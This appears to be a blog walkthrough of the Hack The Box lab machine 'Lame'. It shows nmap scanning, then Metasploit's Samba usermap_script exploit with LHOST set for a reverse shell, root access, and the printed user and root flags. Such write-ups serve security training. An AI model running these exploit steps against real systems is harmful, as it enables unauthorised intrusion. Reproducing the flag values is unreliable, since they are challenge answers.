top of page
Search

Lame


Enumeration


As usual, let's start with nmap

nmap -sV -sC 10.10.10.3

This tells us to use -Pn. Let's try:

nmap -sV -sC -Pn 10.10.10.3

nmap tells us that port 445 is open which is associated with Samba and the version is samba 3.0.20

Let's google "samba 3.0.20 exploit" and see if there is something available. Looks like there is one and we can access it directly from Metasploit.


Let's load Metasploit using:

msfconsole
search samba 3.0.20

use exploit/multi/samba/usermap_script

show options

We need to set up both RHOSTS and LHOST

set RHOSTS 10.10.10.3

10.10.10.3 is the IP of the target machine

set LHOST 10.10.14.12

LHOST is the IP of your VM. Mine is 10.10.14.12. Yours will be different

exploit

It worked! We got a shell on the target machine now. 

whoami

we are root!

ls
cd home
ls
cd makis
ls
cat user.tx

856c4e7468499c31b63029bec549af33

Congratulations! You got the user flag!


Now let's look for the root flag

cd /root
cat user.txt
cat root.txt

674dfcc1c188d43df6664b6fa8ab3a35

Congratulations! You got the root flag!

312 views0 comments

Recent Posts

See All

Previse

Backdoor

Cap

bottom of page